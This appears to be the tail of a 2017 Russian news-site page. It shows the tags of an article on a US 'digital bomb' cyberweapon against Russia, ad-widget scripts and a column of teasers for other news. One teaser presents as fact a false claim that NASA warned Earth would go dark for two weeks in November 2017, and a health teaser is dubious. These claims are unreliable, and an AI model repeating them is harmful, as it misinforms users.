						<a href="http://www.facebook.com/pages/Argumentyru/110475665647188?ref=mf"  target="_blank" rel="nofollow">Facebook</a>,
						<a href="http://vkontakte.ru/club14409962" target="_blank" rel="nofollow">В Контакте</a>,
						<a href="http://my.mail.ru/community/argumenti" target="_blank" rel="nofollow">Мой мир</a>
					</div>

					<script type="text/javascript">
						// выпадающий список под ссылкой
						(function($) {
							$.fn.dropDownBlock = function(block, options) {
							var defaults = {
								speed: 'fast',
								top: $(this).height(),
								left: 0
							},
						opts 	= $.extend(defaults, options),
						toggler = $(this),
						block 	= $(block);
						toggler.css({'outline': 'none'})

						toggler.click(function(e) {
							e.preventDefault();
							$(block).css({
								'position' 	: 'absolute',
								'top' 		: (toggler.offset().top + opts['top']) + 'px',
								'left' 		: (toggler.offset().left + opts['left']) + 'px'
							});
						if($(block).is(':visible')) $(block).fadeOut(opts['speed']);
						else $(block).fadeIn(opts['speed']);
						this.focus();
						});
						toggler.blur(function() {
							$(block).fadeOut(opts['speed']);
						});
					};
				})(jQuery);

				$('#li_sub').dropDownBlock($('#drop_sub'));


			</script>



												<div id="initials">ДЦ</div>
									</div>


								<ul id="tags"><li>Теги:&nbsp;</li>
														<li>						<a href="http://argumenti.ru/search/%23%C2%AB%D1%86%D0%B8%D1%84%D1%80%D0%BE%D0%B2%D0%B0%D1%8F%2B%D0%B1%D0%BE%D0%BC%D0%B1%D0%B0%C2%BB">«цифровая бомба»</a>
					</li>
														<li>,&nbsp;						<a href="http://argumenti.ru/search/%23%D0%BA%D0%B8%D0%B1%D0%B5%D1%80%D0%BE%D1%80%D1%83%D0%B6%D0%B8%D0%B5">кибероружие</a>
					</li>
														<li>,&nbsp;						<a href="http://argumenti.ru/search/%23%D0%A1%D0%A8%D0%90">США</a>
					</li>
														<li>,&nbsp;						<a href="http://argumenti.ru/search/%23%D0%A0%D0%BE%D1%81%D1%81%D0%B8%D1%8F">Россия</a>
					</li>
														<li>,&nbsp;						<a href="http://argumenti.ru/search/%23%D0%9E%D0%B1%D0%B0%D0%BC%D0%B0">Обама</a>
					</li>
						</ul><br>
	

			
		
	<script type="text/javascript">commented()</script>


	<br/>
	



<p id="comment_info">Обсудить наши публикации можно на страничках «АН» в <a href="http://facebook.com/argumentinedeli" target="_blank" rel="nofollow">Facebook</a> и <a href="http://vk.com/club14409962" target="_blank" rel="nofollow">ВКонтакте</a></p>

<div id = "socmedia">
	<div id="fbook"></div>
	<div id="ok_shareWidget"></div>
	<div id="vk_like" style="margin-top: -5px;">
				<!-- Put this script tag to the place, where the Share button will be -->
				<script type="text/javascript"><!--
				document.write(VK.Share.button(false,{type: "round", text: "Сохранить"}));
				--></script>
	</div>

</div>


	<script type="text/javascript">$('#fbook').html('<iframe src="http://www.facebook.com/plugins/like.php?href='+u+'&amp;layout=button_count&amp;show_faces=true&amp;width=150&amp;action=recommend&amp;colorscheme=light&amp;height=21" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:150px; height:21px;" allowTransparency="true"></iframe>');</script>



<script>
!function (d, id, did, st, title, description, image) {
  var js = d.createElement("script");
  js.src = "https://connect.ok.ru/connect.js";
  js.onload = js.onreadystatechange = function () {
  if (!this.readyState || this.readyState == "loaded" || this.readyState == "complete") {
    if (!this.executed) {
      this.executed = true;
      setTimeout(function () {
        OK.CONNECT.insertShareWidget(id,did,st, title, description, image);
      }, 0);
    }
  }};
  d.documentElement.appendChild(js);
}(document,"ok_shareWidget","http://argumenti.ru/",'{"sz":20,"st":"oval","nc":1,"ck":2}',"","","");
</script>

<p class="namerub"><span class="rem">//</span>Подписаться на рассылку эксклюзива от АН</p>
	<noindex>
		<iframe src="http://mailing.argumenti.ru/" style="width:97%; border: none;padding: 0px;">
	    	Ваш браузер не поддерживает плавающие фреймы!
		 </iframe>
	 </noindex>
		
	<div id="unit_83639"><a href="http://advert.mirtesen.ru/" rel="nofollow">Новости advert.mirtesen.ru</a></div>
<script type="text/javascript" charset="utf-8">
(function() {
var sc = document.createElement('script'); sc.type = 'text/javascript'; sc.async = true;
sc.src = '//js.advert.mirtesen.ru/data/js/83639.js'; sc.charset = 'utf-8';
var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(sc, s);
}());
</script>




			<div class="mainrub">
		<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/society">Общество</a></p>
	



	<img src="http://argumenti.ru/images/preview/arhnews/bd6a9b7d63caccb55c039584fc05d1a4.jpg" alt="В базу &quot;Миротворца&quot; попала порноактриса Катя Самбука" />
	
<p class="maxititle"><a href="http://argumenti.ru/society/2017/06/539746">В базу &quot;Миротворца&quot; попала порноактриса Катя Самбука</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/society/2017/06/539746">Порнозвезда Катя Самбука (в миру – Екатерина Долгова) выступила в Севастополе и этого оказалось достаточным, чтобы ей запретили въезд на Украину. Актриса попала в базу украинского сайта «Миротворец».</a></div>	</div>
	<div class="rub_columns">
		<div class="minirub_left">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/world">В мире</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/4e44824f2ce53b81903b5c889e320b12.jpg" alt="Депутаты Украины готовят импичмент Порошенко" />
	

<p class="minititle"><a href="http://argumenti.ru/world/2017/06/539678">Депутаты Украины готовят импичмент Порошенко</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/world/2017/06/539678">Депутаты Верховной Рады Украины обсуждают возможный импичмент президента Украины Петра Порошенко.
Инициатива принадлежит фракции партии "Батькивщина" во главе с Юлией Тимошенко. 
</a></div>		</div>
		<div class="minirub_right">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/army">Армия</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/b7a86ae7072f6fe46b3436fa02c8f851.jpg" alt="Путин поручил обдумать увеличение предельного возраста для военной службы" />
	

<p class="minititle"><a href="http://argumenti.ru/army/2017/06/539721">Путин поручил обдумать увеличение предельного возраста для военной службы</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/army/2017/06/539721">Глава государства Владимир Путин поручил Министерству обороны вместе с другими органами исполнительной власти рассмотреть вопрос о возможности увеличения предельного возраста пребывания на военной службе.
</a></div>		</div>
	</div>
	<a href="https://goo.gl/4hCiMx" rel="nofollow">
<img src="http://argumenti.ru/pub/images/partners/685.gif" width="600" height="90" alt="sungrado"  border="0" /></a>


<div id="unit_83639"><a href="http://advert.mirtesen.ru/" rel="nofollow">Новости advert.mirtesen.ru</a></div>
<script type="text/javascript" charset="utf-8">
(function() {
var sc = document.createElement('script'); sc.type = 'text/javascript'; sc.async = true;
sc.src = '//js.advert.mirtesen.ru/data/js/83639.js'; sc.charset = 'utf-8';
var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(sc, s);
}());
</script>	
	<div class="rub_columns">
		<div class="minirub_left">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/world">В мире</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/c9eaeb2a8e3fffa8efca7c4cbb065ec3.jpg" alt="В Еврокомиссии заявили об отсутствии подготовки к введению новых санкций" />
	

<p class="minititle"><a href="http://argumenti.ru/world/2017/06/539711">В Еврокомиссии заявили об отсутствии подготовки к введению новых санкций</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/world/2017/06/539711">Об этом вице-президент Еврокомиссии Марош Шефчович сообщил, общаясь с журналистами. Кроме того, Шефчович рассказал, что Вашингтон не координировал с Евросоюзом возможное введение новых ограничительных мер.</a></div>		</div>
		<div class="minirub_right">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/politics">Политика</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/c5e40fdfa1e251b85bbd7a09ce31dd66.jpg" alt="Лавров заявил об отсутствии у России планов по нападению на НАТО" />
	

<p class="minititle"><a href="http://argumenti.ru/politics/2017/06/539740">Лавров заявил об отсутствии у России планов по нападению на НАТО</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/politics/2017/06/539740">Регулярные заявления иностранных политиков о «российской угрозе» являются предлогом для усиления присутствия Североатлантического альянса на границах с РФ. Глава МИД России уверен, что этот предлог выдуманный. </a></div>		</div>
	</div>
<!-- заввершающая линия -->
	<div class="publ_line">
		<div class="publ_line_lend">
		</div>
		<div class="publ_line_rend">
		</div>
	</div>


	
<div id="yandex_under_article" style="margin:0 auto"></div>
<script type="text/javascript">
if (window.matchMedia("only screen and (max-device-width: 100px)").matches){document.getElementById("yandex_under_article").style.width = "100px";var m= 2; ty="posterVertical"}
else if (window.matchMedia("only screen and (min-device-width: 100px)").matches){var m= 2; ty="vertical"}
(function(w, d, n, s, t) {
   w[n] = w[n] || [];
   w[n].push(function() {
       Ya.Direct.insertInto(50615, "yandex_under_article", {
           ad_format: "direct",
           font_size: 0.8,
           type: "horizontal",
           limit: 2,
           title_font_size: 1,
           links_underline: false,
           site_bg_color: "E7E7E7",
           bg_color: "E7E7E7",
           header_bg_color: "FFFFFF",
           border_color: "FFFFFF",
           title_color: "673366",
           url_color: "333333",
           text_color: "000000",
           hover_color: "0066FF",
           sitelinks_color: "0000CC",
           favicon: true,
           no_sitelinks: true
       });
   });
   t = d.getElementsByTagName("script")[0];
   s = d.createElement("script");
   s.src = "//an.yandex.ru/system/context.js";
   s.type = "text/javascript";
   s.async = true;
   t.parentNode.insertBefore(s, t);
})(window, document, "yandex_context_callbacks");
</script>  
<br>
<!-- TR AN --><!--54569596--><!--54569596-->	<h2 class="namerub"><span class="rem">//</span>Новости Гнездо.ру</h2>
<!-- Асинхронный код информера news.2xclick.ru -->
<div id="gnezdo_ru_14115">Загрузка...</div>
<script language='JavaScript'>
var s = document.createElement("script"),
f = function(){ document.getElementsByTagName("head")[0].appendChild(s); };
s.type = "text/javascript";
s.async = true;
s.src = '//news.2xclick.ru/show/14115/block_a.js';
if (window.opera == "[object Opera]") {
document.addEventListener("DOMContentLoaded", f);
} else { f(); }
</script>
<!-- Конец кода информера news.2xclick.ru -->
	
	<div class="rub_columns">
		<div class="minirub_left">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/incident">Происшествия</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/2f7ac2b79cbdb8e92434a7b0f8d9b571.jpg" alt="Полиция Лондона назвала причину пожара в высотке: холодильник" />
	

<p class="minititle"><a href="http://argumenti.ru/incident/2017/06/539728">Полиция Лондона назвала причину пожара в высотке: холодильник</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/incident/2017/06/539728">Причиной пожара в лондонском небоскребе Grenfell Tower, унесшего жизни 79 человек, стал неисправный холодильник. Об этом в пятницу, 23 июня, со ссылкой на полицейский отчет сообщает BBC News.
</a></div>		</div>
		<div class="minirub_right">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/society">Общество</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/991cdbeacdec57bc279cdc982343a0e5.jpg" alt="Экспертиза не выявила наличие алкоголя в организме &laquo;пьяного&raquo; мальчика" />
	

<p class="minititle"><a href="http://argumenti.ru/society/2017/06/539730">Экспертиза не выявила наличие алкоголя в организме &laquo;пьяного&raquo; мальчика</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/society/2017/06/539730">В интернете появилось отсканированное заключение экспертов, в котором говорится о том, что установить наличие алкоголя в организме погибшего в ДТП в Подмосковье 6-летнего мальчика не представляется возможным.</a></div>		</div>
	</div>
	<h2 class="namerub"><span class="rem">//</span>Новости ADWILE</h2>
<div id="smi_teaser_10213">
<center><a href="http://partner.adwile.com" rel="nofollow">Нативная реклама ADWILE</a></center>
</div>
<script type="text/JavaScript" encoding="utf8">
 (function() {
 var sm = document.createElement("script");
 sm.type = "text/javascript";
 sm.async = true;
 sm.src = "//jsn.24smi.net/4/c/10213.js";
 var s = document.getElementsByTagName("script")[0];
 s.parentNode.insertBefore(sm, s);})();
</script>
	<div class="rub_columns">
		<div class="minirub_left">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/science">Наука</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/6a30437ca0e6af6df06159c22497aa4d.jpg" alt="NASA: Земля в ноябре на две недели погрузится в полную темноту" />
	

<p class="minititle"><a href="http://argumenti.ru/science/2017/06/539694">NASA: Земля в ноябре на две недели погрузится в полную темноту</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/science/2017/06/539694">Астрономическое сообщество из международного аэрокосмического агентства NASA предупредило человечество, что с 15 по 29 ноября 2017 года Земля погрузится в тьму. Соответствующий документ уже отправлен в Белый дом США.
</a></div>		</div>
		<div class="minirub_right">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/showbiz">Шоу-бизнес</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/730b139b7aa48295484d316ae3d0bdcc.jpg" alt="Виторган попросил Собчак скрывать измены до последнего" />
	

<p class="minititle"><a href="http://argumenti.ru/showbiz/2017/06/539716">Виторган попросил Собчак скрывать измены до последнего</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/showbiz/2017/06/539716">Недавно Ксения призналась в том, что у неё с мужем есть определенная договоренность об изменах. 35-летняя телеведущая и Максим Виторган условились в случае свершившегося факта неверности никогда не рассказывать о нем. 



</a></div>		</div>
	</div>
	<a href="https://goo.gl/4hCiMx" rel="nofollow">
<img src="http://argumenti.ru/pub/images/partners/685.gif" width="600" height="90" alt="sungrado"  border="0" /></a>


<p class="namerub"><span class="rem">//</span>Новости партнеров</p>
<div id="smi_teaser_3101">
    <center><a href="http://24smi.info" rel="nofollow">Агрегатор новостей 24СМИ</a></center>
</div>
<script type="text/JavaScript" encoding="utf8">
                (function() {
                var sm = document.createElement("script");
                sm.type = "text/javascript";
                sm.async = true;
                sm.src = "//jsn.24smi.net/6/2/3101.js";
                var s = document.getElementsByTagName("script")[0];
                s.parentNode.insertBefore(sm, s);})();</script>
            
<hr>
	<div class="rub_columns">
		<div class="minirub_left">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/crime">Криминал</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/3f56bf0a797128cfae32663acbb34136.jpg" alt="Москвич жестоко расправился со своей любовницей" />
	

<p class="minititle"><a href="http://argumenti.ru/crime/2017/06/539744">Москвич жестоко расправился со своей любовницей</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/crime/2017/06/539744">Трагедия произошла в Зеленограде Московской области 23 июня. 35-летний мужчина с помощью бейсбольной биты расправился со своей сожительницей. Дама скончалась на месте происшествия от полученных травм.</a></div>		</div>
		<div class="minirub_right">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/culture">Культура</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/6955c3545b58876849457af4a3f3f2b8.jpg" alt="Ансамбль солистов-виртуозов Philharmonix выступит в Москве" />
	

<p class="minititle"><a href="http://argumenti.ru/culture/2017/06/539745">Ансамбль солистов-виртуозов Philharmonix выступит в Москве</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/culture/2017/06/539745">Концерт ансамбля Philharmonix состоится в КЗ имени Чайковского 25 июня 2017 года.Ансамбль объединяет трех cолистов-виртуозов Венского филармонического оркестра, двух ведущих солистов Берлинской филармонии, одного из самых разносторонних австрийских пианистов, а также скрипача из Австрии.</a></div>		</div>
	</div>

		

	<div class="rub_columns">
		<div class="minirub_left">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/society">Общество</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/3ed06e52bcc9b0a84a48de2cda938847.jpg" alt="Полиция опровергла проведение повторной экспертизы по делу &laquo;пьяного&raquo; мальчика" />
	

<p class="minititle"><a href="http://argumenti.ru/society/2017/06/539742">Полиция опровергла проведение повторной экспертизы по делу &laquo;пьяного&raquo; мальчика</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/society/2017/06/539742">Информация о проведении повторной экспертизы, по итогам которой в крови погибшего под колесами иномарки 6-летнего мальчика не нашли алкоголя, не соответствует действительности. Об этом заявили в МВД.</a></div>		</div>
		<div class="minirub_right">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/society">Общество</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/0e0ba8660a0be1062473fe9cbd6bf809.jpg" alt="ЦИК РФ: Алексей Навальный не имеет права участвовать в выборах как кандидат" />
	

<p class="minititle"><a href="http://argumenti.ru/society/2017/06/539743">ЦИК РФ: Алексей Навальный не имеет права участвовать в выборах как кандидат</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/society/2017/06/539743">В российском Центризбиркоме 23 июня заявили журналистам, что оппозиционер Алексей Навальный не имеет права избираться и его участие в президентской гонке как одного из кандидатов будет незаконно.</a></div>		</div>
	</div>


	
	<div class="rub_columns">
		<div class="minirub_left">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/crime">Криминал</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/cd679f9333f159a7d907dc376f60b66e.jpg" alt="В Москве задержан авторитетный вор в законе" />
	

<p class="minititle"><a href="http://argumenti.ru/crime/2017/06/539741">В Москве задержан авторитетный вор в законе</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/crime/2017/06/539741">Вор в законе Ткач Няганьский, а по паспорту - 37-летний Андрей Ткаченко, 23 июня задержан оперативниками уголовного розыска Москвы при поддержке бойцов Росгвардии в одном из столичных ресторанов.</a></div>		</div>
		<div class="minirub_right">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/society">Общество</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/5cc51567cae54fca227a33d298d1f893.jpg" alt="В Подмосковье появится новый вид экскурсий - на заводы по переработке мусора" />
	

<p class="minititle"><a href="http://argumenti.ru/society/2017/06/539738">В Подмосковье появится новый вид экскурсий - на заводы по переработке мусора</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/society/2017/06/539738">Ранее «Аргументы недели» сообщали о планах властей Подмосковья открыть первый в регионе завод по переработке мусора. Но власти Московской области решили пойти дальше и открыть экскурсии на подобные заводы.</a></div>		</div>
	</div>




	<div class="rub_columns">
		<div class="minirub_left">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/live">live</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/f78eb3d2d76e0e4b1c5efd7dbaba53c0.jpg" alt="&laquo;Не только в Подмосковье, но и Москве накоплены миллиарды кубометров мусора!&raquo;" />
	

<p class="minititle"><a href="http://argumenti.ru/live/2017/06/539739">&laquo;Не только в Подмосковье, но и Москве накоплены миллиарды кубометров мусора!&raquo;</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/live/2017/06/539739">Власти Подмосковья считают, что Балашихе нужны два мусороперерабатывающих завода. Напомним, что Владимир Путин поставил задачу - закрыть в течение месяца свалку в Балашихе. Вопрос: «Мусор не надо оставлять на долгую память?» </a></div>		</div>
		<div class="minirub_right">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/society">Общество</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/a6b94c3176fecd8fcd7192732e46dc38.jpg" alt="Дуров обвинил Роскомнадзор в саботаже государственных интересов" />
	

<p class="minititle"><a href="http://argumenti.ru/society/2017/06/539736">Дуров обвинил Роскомнадзор в саботаже государственных интересов</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/society/2017/06/539736">В своем посте в социальной сети предприниматель удивился тому, что власти РФ собираются запретить «нейтральный по отношению к России» Telegram, а не его западные аналоги, контролирующиеся США. </a></div>		</div>
	</div>

	<!-- заввершающая линия -->
	<div class="publ_line">
		<div class="publ_line_lend">
		</div>
		<div class="publ_line_rend">
		</div>
	</div>


	
	<div class="rub_columns">
		<div class="minirub_left">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/crime">Криминал</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/ed8ec0ff97e7a688daf15d567eb6c91d.jpg" alt="На Кубани чиновник жестоко избил сотрудника ФСБ" />
	

<p class="minititle"><a href="http://argumenti.ru/crime/2017/06/539737">На Кубани чиновник жестоко избил сотрудника ФСБ</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/crime/2017/06/539737">Сотрудник погранслужбы на Черноморском побережье Кубани выполнял свою работу и хотел проверить документы на лодку, но хозяин плавсредства, местный чиновник, так рассвирепел, что избил палкой пограничника.</a></div>		</div>
		<div class="minirub_right">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/crime">Криминал</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/793d9f7eefe137723c7641f30c9ac2cb.png" alt="В Мурманской области убийцы школьника заслушали судебный приговор" />
	

<p class="minititle"><a href="http://argumenti.ru/crime/2017/06/539734">В Мурманской области убийцы школьника заслушали судебный приговор</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/crime/2017/06/539734">За жестокое убийство 16-летнего подростка в городе Кола (Мурманская область) 23 июня отправлены в тюрьму молодой парень и юная девушка. Убийство мальчика произошло из-за обычной словесной перепалки.</a></div>		</div>
	</div>

	<div class="rub_columns">
		<div class="minirub_left">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/world">В мире</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/5edbc7a88e1698f4d36d70497c66297f.jpg" alt="СМИ узнали о разработке США направленной против России &laquo;цифровой бомбы&raquo;" />
	

<p class="minititle"><a href="http://argumenti.ru/world/2017/06/539733">СМИ узнали о разработке США направленной против России &laquo;цифровой бомбы&raquo;</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/world/2017/06/539733">В США изготовлена «цифровая бомба», которая в любой момент может быть использована против России. Об этом узнали американские СМИ. Речь идет о размещении кибероружия в системах инфраструктуры РФ. </a></div>		</div>
		<div class="minirub_right">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/society">Общество</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/64a57a782ae12947f2e2a753eb02984e.jpg" alt="Володин призвал депутатов не пугать россиян отменой новогодних каникул" />
	

<p class="minititle"><a href="http://argumenti.ru/society/2017/06/539731">Володин призвал депутатов не пугать россиян отменой новогодних каникул</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/society/2017/06/539731">Ранее в четверг стало известно, что представители фракции КПРФ внесли на рассмотрение Государственной Думы законопроект, который предлагает изменить количество праздничных дней в Российской Федерации. </a></div>		</div>
	</div>


	<div class="rub_columns">
		<div class="minirub_left">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/society">Общество</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/d1808fe9a04c8d89acb6c3ac9c59b350.jpg" alt="Каждый третий россиянин считает необходимым введение визового режима с Украиной" />
	

<p class="minititle"><a href="http://argumenti.ru/society/2017/06/539729">Каждый третий россиянин считает необходимым введение визового режима с Украиной</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/society/2017/06/539729">Больше трети россиян поддержали введение визового режима с Украиной. По опросу «Левада-Центра» подавляющее большинство так или иначе следит за происходящее в соседнем государстве. 
</a></div>		</div>
		<div class="minirub_right">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/world">В мире</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/ab1128ae1b11cccad7dbdc3a7ef3700e.jpg" alt="Савченко рассказала об обмене нецензурными жестами с Гройсманом в Раде" />
	

<p class="minititle"><a href="http://argumenti.ru/world/2017/06/539727">Савченко рассказала об обмене нецензурными жестами с Гройсманом в Раде</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/world/2017/06/539727">Надежда Савченко рассказала, зачем она показала средний палец Владимиру Гройсману во время заседания Верховной Рады. О нецензурном жесте, который позволила себе депутат, украинские издания сообщили ранее. </a></div>		</div>
	</div>

	<div class="rub_columns">
		<div class="minirub_left">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/incident">Происшествия</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/a6fbc23ca35af140ecfbc638dc99b546.jpg" alt="В столичном метро загорелся новый поезд &laquo;Москва&raquo;" />
	

<p class="minititle"><a href="http://argumenti.ru/incident/2017/06/539726">В столичном метро загорелся новый поезд &laquo;Москва&raquo;</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/incident/2017/06/539726">В московской подземке утром загорелся состав типа «Москва», такие составы движутся по Таганско-Краснопресненской линии. Инцидент произошёл при попытке тронуться со станции.

</a></div>		</div>
		<div class="minirub_right">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/world">В мире</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/82221a4de02e502eebbb0b087a7c85da.jpg" alt="Экс-глава украинской разведки рассказал о сторонниках РФ в окружении Порошенко" />
	

<p class="minititle"><a href="http://argumenti.ru/world/2017/06/539725">Экс-глава украинской разведки рассказал о сторонниках РФ в окружении Порошенко</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/world/2017/06/539725">В окружении президента Украины Петра Порошенко есть немало людей, которые являются сторонниками России. Об этом украинской прессе заявил Николай Маломуж, бывший руководитель Службы внешней разведки страны.</a></div>		</div>
	</div>	

	<div class="rub_columns">
		<div class="minirub_left">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/showbiz">Шоу-бизнес</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/76300a277dd6f66a3d833b1597bd32a1.jpg" alt="Дима Билан высказался о взятках на шоу &quot;Голос&quot;" />
	

<p class="minititle"><a href="http://argumenti.ru/showbiz/2017/06/539724">Дима Билан высказался о взятках на шоу &quot;Голос&quot;</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/showbiz/2017/06/539724">Российский поп-исполнитель Дима Билан побеседовал с журналистами о шоу "Голос". По словам звезды, на телепроекте родители участников не предлагали организаторам деньги за успехи их детей.
</a></div>		</div>
		<div class="minirub_right">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/society">Общество</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/927062d36704754e1c3edaf034a0ac71.jpg" alt="Крымский бензин и немецкие рояли" />
	

<p class="minititle"><a href="http://argumenti.ru/society/2017/06/539719">Крымский бензин и немецкие рояли</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/society/2017/06/539719">И снова заговорили про дорогущий бензин в Крыму. И снова Сергей АКСЕНОВ обещает разобраться и принять меры. И снова будут виноваты нефтетрейдеры. И снова топливо будет дорожать.</a></div>		</div>
	</div>	
	<div class="rub_columns">
		<div class="minirub_left">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/health">Здоровье</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/d1c33b9b9d0c74053701a20012235b22.jpg" alt="Оказывается, обручальные кольца плохо влияют на здоровье мужчин" />
	

<p class="minititle"><a href="http://argumenti.ru/health/2017/06/539718">Оказывается, обручальные кольца плохо влияют на здоровье мужчин</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/health/2017/06/539718">Ученые предупреждают: обручальные кольца опасны для здоровья мужчин. Связывают это с тем, что со временем драгоценный металл начинает окисляться и выделять продукты химической реакции.

</a></div>		</div>
		<div class="minirub_right">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/meteo">Метеоновости</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/488bb85cdcb244bcfdc464481f793994.jpg" alt="МЧС предупредило жителей Москвы о приближении грозы и града" />
	

<p class="minititle"><a href="http://argumenti.ru/meteo/2017/06/539717">МЧС предупредило жителей Москвы о приближении грозы и града</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/meteo/2017/06/539717">Как сообщили некоторое время назад в МЧС, на российскую столицу надвигается гроза. Также метеорологи прогнозируют выпадение града и усиление ветра. Местами его порывы достигнут 17 метров в секунду.</a></div>		</div>
	</div>	

	<div class="rub_columns">
		<div class="minirub_left">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/politics">Политика</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/446c22093fe0d73713df48bc13a80e90.jpg" alt="Лавров заявил о намерении Москвы отстаивать георгиевскую ленту за рубежом" />
	

<p class="minititle"><a href="http://argumenti.ru/politics/2017/06/539713">Лавров заявил о намерении Москвы отстаивать георгиевскую ленту за рубежом</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/politics/2017/06/539713">Так глава МИД РФ прокомментировал инцидент, произошедший накануне в украинском городе Днепр. Местная полиция отчиталась о задержании женщины, которая пришла на памятную акцию с георгиевской лентой. </a></div>		</div>
		<div class="minirub_right">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/society">Общество</a></p>	
	




	<img src="http://argumenti.ru/images/preview/arhnews/d64354eb511c56416ba807478ce21760.jpg" alt="Монету номиналом 50 тысяч рублей отчеканили на петербургском Монетном дворе" />
	

<p class="minititle"><a href="http://argumenti.ru/society/2017/06/539715">Монету номиналом 50 тысяч рублей отчеканили на петербургском Монетном дворе</a></p>
<div class="anonstxt"><a href="http://argumenti.ru/society/2017/06/539715">Петербургский Монетный двор представил самую дорогую монету в России номиналом 50 тысяч рублей. Она изготовлена из золота 999-ой пробы и весит пять килограммов.
</a></div>		</div>
	</div>	

	<div class="rub_columns">
		<div class="minirub_left">
			<p class="namerub"><span class="rem">//</span><a href="http://argumenti.ru/rubrics/society">Общество</a></p>	
	




